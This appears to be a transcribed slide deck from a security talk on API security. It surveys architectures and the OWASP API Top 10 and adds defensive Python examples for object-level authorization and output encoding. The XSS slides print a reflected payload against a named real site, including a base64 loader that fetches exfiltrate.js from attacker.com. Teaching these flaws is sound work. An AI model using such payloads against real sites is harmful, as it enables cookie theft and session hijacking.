Web Apps: APIs’ Nightmare
www.char49.com | TRUE SECURITY
Who Am I
Paulo Silva
● Security Researcher/Pentester
● 15+ years as a Software Developer
● Long-term OWASP Volunteer
● Strong believer in spreading security awareness
@pauloasilva_com
/devpauloasilva
paulo@char49.com
[Image slide: the birth of the web; source: https://home.cern/science/computing/birth-web]
Traditional Web Applications

[Diagram: Client <-- HTTP --> Server running PHP with a Database. Server file tree: scripts/main.js ..., style/display.js ..., images/background.js ..., php/index.php, php/login.php ...]

Request sequence built up over the slides (request, then the Content-Type of the response):
GET /                   Content-Type: text/html
GET /scripts/main.js    Content-Type: application/javascript
GET /style/display.css  Content-Type: text/css
...
GET /login.php          Content-Type: text/html
POST /login.php         Content-Type: text/html
Mobile Applications

[Diagram: Client <-- HTTP --> Server running PHP with a Database. Server file tree: php/auth.php, users.php, posts.php, comments.php ...]

Request sequence built up over the slides (every request and response carries Content-Type: application/json):
POST /login
GET /users/me
GET /posts/
...
Connected Things / Internet of Things

[Diagram: Client <-- HTTP --> a set of APIs (API 1, API 2, API 3 ... API N) that in turn depend on databases (DB 1, DB 2), 3rd Party APIs and internal services (Service 1, Service 2, Service 3, Service 4 ... Service N)]

Request sequence built up over the slides (every request and response carries Content-Type: application/json):
GET /device/config
POST /device/auth
POST /location
...
Modern Web Applications

[Diagram: same back end as the Connected Things slide (API 1 ... API N, DB 1, DB 2, 3rd Party APIs, Service 1 ... Service N); the server additionally hosts a static public/ tree: index.html, bundle.js ...]

Request sequence built up over the slides (request, then the Content-Type of the response):
GET /             Content-Type: text/html
GET /bundle.js    Content-Type: application/javascript
POST /login       Content-Type: application/json
...
GET /places/1234  Content-Type: application/json
...
OWASP API Security Top 10 (2023)
API1:2023 Broken Object-Level Authorization
API2:2023 Broken Authentication
API3:2023 Broken Object Property Level Authorization
API4:2023 Unrestricted Resource Consumption
API5:2023 Broken Function-Level Authorization
API6:2023 Unrestricted Access to Sensitive Business Flows
API7:2023 Server Side Request Forgery
API8:2023 Security Misconfiguration
API9:2023 Improper Inventory Management
API10:2023 Unsafe Consumption of APIs
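As an added example (not from the slides, and not code from the speaker or Char49), the control whose absence is API1:2023 Broken Object-Level Authorization, shown on the GET /places/1234 request from the "Modern Web Applications" diagram. The place records, the user ids, the owner_id field and the NotFound/handler helpers are all constructed for this example; the caller id is assumed to come from the session or token issued by POST /login.

```python
"""Added example (not from the slides): an object-level authorization check
for GET /places/1234, i.e. the control missing in API1:2023 BOLA.
Place records, user ids and the owner_id field are constructed here."""
from dataclasses import dataclass
from typing import Callable, Optional, Tuple


@dataclass(frozen=True)
class Place:
    id: int
    owner_id: int  # constructed: which user the record belongs to
    name: str


# Constructed sample data standing in for "DB 1" in the diagram.
PLACES = {
    1234: Place(id=1234, owner_id=7, name="Home charger"),
    1235: Place(id=1235, owner_id=9, name="Office charger"),
}


class NotFound(Exception):
    """The object does not exist, or must look to this caller as if it does not."""


def get_place_vulnerable(place_id: int, caller_id: int) -> Place:
    """BOLA: the id taken from the URL is trusted on its own, so any
    authenticated user can read any place just by changing the number."""
    if place_id not in PLACES:
        raise NotFound(place_id)
    return PLACES[place_id]


def get_place_hardened(place_id: int, caller_id: int) -> Place:
    """Object-level check: the record must exist AND belong to the caller.
    Both failures map to NotFound so the response does not reveal whether a
    foreign id exists (a distinct 403 would confirm it)."""
    place = PLACES.get(place_id)
    if place is None or place.owner_id != caller_id:
        raise NotFound(place_id)
    return place


Handler = Callable[[int, int], Place]


def read_place(handler: Handler, place_id: int, caller_id: int) -> Tuple[int, Optional[dict]]:
    """Turn a handler result into (HTTP status, JSON body) the way an API
    layer would. caller_id is assumed to come from the session/token created
    by POST /login, never from the request body or query string."""
    try:
        place = handler(place_id, caller_id)
    except NotFound:
        return 404, None
    return 200, {"id": place.id, "name": place.name}
```

The point of the hardened handler is that the ownership predicate lives next to the lookup, not in a middleware that only checks "is logged in": user 7 asking for place 1235 gets the same 404 as for an id that never existed.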
Cross-Site Scripting

Vulnerable Parameter (the ke query parameter is reflected into the response unencoded):
https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=alert(document.cookie)>

Loader + Payload (same parameter; the onerror handler now base64-decodes and evals the real payload):
https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=eval(atob("KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID0gJ2h0dHBzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ=="))>

Malicious Script: the base64 string decodes to a short function that creates a <script> element pointing at attacker.com/exfiltrate.js and appends it to the document body, so the loader stays small and the real code is fetched from the attacker's host.

[Slide labels: Malicious Script, HTTP Fundamentals, Payload, Cross-Site Scripting]
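As an added example (not from the slides, and not code from the speaker or the affected site), the reason the reflected ke parameter is exploitable and how contextual output encoding makes the slide's first payload inert. The query parser, the two render functions, the page template, the sample query string and the markup check are constructed for this example; the payload string itself is the one shown on the slide.

```python
"""Added example (not from the slides): reflecting an unencoded query parameter
versus HTML-encoding it for the text-node context. Everything except the
payload string is constructed for this example."""
import html
import re
from urllib.parse import parse_qs

# Constructed query string carrying the slide's first payload in `ke`.
SAMPLE_QUERY = (
    "OpenAgent&typ=nummer&la=USen"
    "&ke=6546546<img src=x onerror=alert(document.cookie)>"
)


def ke_from_query(query: str) -> str:
    """Pull the `ke` parameter out of a raw query string (first value wins).
    keep_blank_values so the bare `OpenAgent` key does not break parsing."""
    params = parse_qs(query, keep_blank_values=True)
    return params.get("ke", [""])[0]


def render_vulnerable(ke: str) -> str:
    """Reflects the parameter verbatim into HTML: the browser parses the <img>
    tag and fires its onerror handler, which is the XSS on the slide."""
    return f"<p>Charging station: {ke}</p>"


def render_hardened(ke: str) -> str:
    """Output encoding for an HTML text-node context: < > & \" ' become
    entities, so the payload is displayed as text and never parsed as markup."""
    return f"<p>Charging station: {html.escape(ke, quote=True)}</p>"


# Crude stand-in for "the browser would create an element from this".
_TAG = re.compile(r"<[a-zA-Z][^>]*>")


def contains_markup(rendered: str) -> bool:
    """True if any tag other than the template's own <p> survives in the output."""
    tags = {m.group(0).split()[0].strip("<>/").lower() for m in _TAG.finditer(rendered)}
    return bool(tags - {"p"})
```

The encoding is context-specific: html.escape is right for a text node or a quoted attribute, but a value placed inside a URL, a JavaScript string or a CSS block needs that context's encoder instead, which is why the OWASP cheat sheets listed at the end of the deck treat each context separately.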
Resources

OWASP
● OWASP API Security Project
● OWASP API Security Top 10 2023
● OWASP API Security Top 10 2019
● Goats
  ● OWASP Vulnerable Web Applications Directory
  ● OWASP crAPI - Completely Ridiculous API
  ● OWASP Juice Shop
● OWASP Cheat Sheets Series
  ● Authentication Cheat Sheet
  ● Authorization Cheat Sheet
  ● GraphQL Cheat Sheet
  ● REST Security Cheat Sheet
  ● Web Service Security Cheat Sheet
● OWASP Secure Coding Practices-Quick Reference Guide
● OWASP Go Secure Coding Practices Guide

Other References
● HTTP
  ● Basics of HTTP - mdn web docs
  ● Cross-Origin Resource Sharing (CORS) - mdn web docs
● API Protocols
  ● REST
    ● Representational state transfer - Wikipedia
    ● Representational State Transfer (REST) - Fielding Dissertation
  ● RPC
    ● Remote procedure call - Wikipedia
    ● OpenRPC
    ● JSON-RPC
    ● XML-RPC
    ● gRPC
  ● GraphQL
    ● Introduction to GraphQL
    ● GraphQL blogposts Series - Checkmarx
    ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify
● MindAPI
  ● MindAPI References

Thank You!
www.char49.com
